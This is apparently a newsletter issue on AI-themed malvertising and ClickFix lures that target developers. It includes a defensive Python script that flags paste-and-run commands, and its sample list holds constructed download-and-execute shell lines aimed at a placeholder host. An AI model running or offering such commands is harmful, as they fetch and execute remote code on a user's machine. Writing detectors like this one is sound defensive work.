Gradient Brief

Issue No. 08 • May 26, 2026

MLOps & AI Infrastructure — for the engineers building it


AI Developers Under Fire: Malvertising Campaigns Exploit AI Hype

A sophisticated wave of malvertising is actively targeting developers and users of AI tools. Over the past year, security researchers have documented at least 20 distinct malware campaigns exploiting the AI ecosystem. Attackers are using paid Google Ads, SEO poisoning, and fake extensions to distribute infostealers like AMOS and Amatera, specifically targeting users of Claude, ChatGPT, Grok, and DeepSeek.

The attack vectors have evolved from simple fake websites to exploiting the trusted domains of the AI platforms themselves. In a particularly insidious technique known as "ClickFix," attackers buy Google Ads that direct users to publicly shared, user-generated conversations hosted on legitimate domains like chatgpt.com or claude.ai. These carefully curated chats masquerade as official installation guides, tricking victims into pasting obfuscated Terminal commands that silently download and execute macOS infostealers without triggering standard security warnings.

macOS users are disproportionately targeted in these campaigns, because users of AI and vibe-coding tools skew heavily toward Mac environments and often hold high-value credentials such as SSH keys, AWS tokens, and cryptocurrency wallets. In one notable campaign targeting Claude Code, attackers created a pixel-perfect replica of Anthropic's documentation hosted on a Squarespace subdomain, instructing users to run malicious terminal commands. For infrastructure teams, the takeaway is clear: developer environments are under siege, and traditional network controls are failing to catch these social engineering tactics. Organizations must enforce strict policies against running unverified terminal commands and implement robust endpoint monitoring.
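Endpoint monitoring of the kind the story calls for usually starts with a triage pass over shell history or process-creation logs, looking for the paste-and-run shapes that ClickFix lures rely on: a download piped straight into a shell, a base64 blob decoded into a shell, a remote command substitution, quarantine attributes being stripped. The Python below is an added illustration written for this issue; it is not code from Gradient Brief or from any vendor or platform named above. The sample command lines, the example.invalid URLs and the rule weights are all constructed assumptions, and the base64 literal is generated in-script so the decode-and-rescan path can be exercised.

```python
"""Flag shell commands that match ClickFix-style paste-and-run patterns.

Added illustration for triaging shell history or endpoint process logs.
Sample commands are constructed, not captured from any real campaign.
"""
import base64
import re

# Constructed payload for the sample only: built here rather than hand-encoded.
_INNER = base64.b64encode(b"curl http://example.invalid/x | sh").decode()

# Constructed sample: a mix of ordinary developer activity and suspicious lines.
SAMPLE_COMMANDS = [
    "brew install node",
    "npm install -g some-cli-tool",
    "curl -fsSL https://example.invalid/setup.sh | bash",
    f"echo '{_INNER}' | base64 -d | sh",
    "git clone https://example.invalid/repo.git",
    'nohup /bin/bash -c "$(curl -s https://example.invalid/x)" >/dev/null 2>&1 &',
    "xattr -d com.apple.quarantine ./installer",
    "ls -la ~/.ssh",
]

# (rule name, weight, pattern). Weights are an assumption for this example.
RULES = [
    ("download_piped_to_shell", 3,
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("remote_command_substitution", 3,
     re.compile(r"\$\(\s*(curl|wget)\b")),
    ("base64_decode_to_shell", 3,
     re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("quarantine_attr_removed", 2,
     re.compile(r"\bxattr\b.*com\.apple\.quarantine")),
    ("output_silenced_background", 1,
     re.compile(r">\s*/dev/null\s+2>&1\s*&\s*$")),
]

# Long runs of base64 alphabet characters; shorter tokens are too noisy.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _decoded_literals(cmd):
    """Yield printable text recovered from base64-looking tokens in cmd.

    Tokens that are not valid base64, or decode to binary junk (for example
    a git commit hash), are silently skipped.
    """
    for m in _B64_TOKEN.finditer(cmd):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("ascii", errors="ignore")
        if text and text.isprintable():
            yield text


def assess(cmd):
    """Return (score, findings) for one command line.

    Findings that only appear after decoding an embedded base64 payload are
    prefixed with 'decoded:' so the reviewer knows where the match came from.
    """
    findings = []
    score = 0
    for name, weight, pat in RULES:
        if pat.search(cmd):
            findings.append(name)
            score += weight
    for text in _decoded_literals(cmd):
        for name, weight, pat in RULES:
            if pat.search(text):
                findings.append("decoded:" + name)
                score += weight
    return score, findings


def verdict(score):
    """Bucket a score; thresholds are an assumption for this example."""
    if score >= 3:
        return "high"
    if score > 0:
        return "review"
    return "clean"


def triage(commands):
    """Map each command to its verdict and findings. Clean commands are kept
    so a reviewer sees the suspicious ones in sequence context."""
    out = []
    for cmd in commands:
        score, findings = assess(cmd)
        out.append({"cmd": cmd, "verdict": verdict(score), "findings": findings})
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE_COMMANDS):
        print(f"{row['verdict']:>6}  {row['cmd'][:60]:<60}  {row['findings']}")
```

Two design points worth noting. First, the decoder rescans anything that decodes to printable text with the same rules, so an `echo ... | base64 -d | sh` line is flagged both for the decode-to-shell shape and for what the payload actually does, which helps a responder prioritise. Second, matching on command text alone is a triage heuristic, not a control: the page's mitigation (policy against pasting unverified commands, plus endpoint monitoring that sees the resulting child processes and network connections) is what prevents the infostealer from running, and this pass only helps find where that policy has already been bypassed.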

Tool of the Week: CoreWeave Sandboxes

Commercial  |  On-Cluster or Serverless  |  CoreWeave

A unified execution layer that provides secure, isolated environments specifically designed for running reinforcement learning (RL), agent tool use, and model evaluation workflows.

As AI systems evolve to take actions, training requires more than just compute. RL and evaluation workflows require isolated environments that can run code safely, maintain state across steps, and scale massively. CoreWeave Sandboxes solves this by running directly within a customer's CoreWeave Kubernetes Service (CKS) cluster, or as a serverless runtime through Weights & Biases (W&B).

The platform is built for massive concurrency. IBM Research reported spinning up thousands of sandboxes in parallel per training step for their RL workflows, each with its own container image and resource boundaries. For the serverless option, sandbox activity is captured directly in the same W&B run view as training metrics, allowing teams to debug in context rather than across disconnected tools.

Quick Hits

  • Red Hat AI 3.4 Ships AgentOps Stack Red Hat announced Red Hat AI 3.4, a "metal-to-agent" platform that tackles the operational friction of moving autonomous agents to production. It features a new Model-as-a-Service (MaaS) layer, vLLM upgrades supporting request prioritization, and a robust AgentOps framework with SPIFFE/SPIRE identity management and an MCP server catalog for governed tool access.
  • Fractile Raises $220M for In-Memory Inference Chip The UK-based startup closed a Series B led by Accel to take its SRAM-based inference chip to production. Fractile's architecture performs matrix multiplications inside SRAM cells alongside compute logic, removing the DRAM bottleneck. The company claims this approach can run frontier models 25 times faster at one-tenth the cost of current GPU setups.
  • Gartner Predicts 40% AI Observability Adoption by 2028 A new Gartner report projects that 40% of organizations deploying AI will implement dedicated AI observability tools within four years. The firm cited the growing need for predictive issue detection and the inability of traditional software monitoring to trace opaque deep learning models and agentic AI logic.

Gradient Brief is published for ML engineers, data scientists, and technical founders. Forward to a colleague who should be reading this.
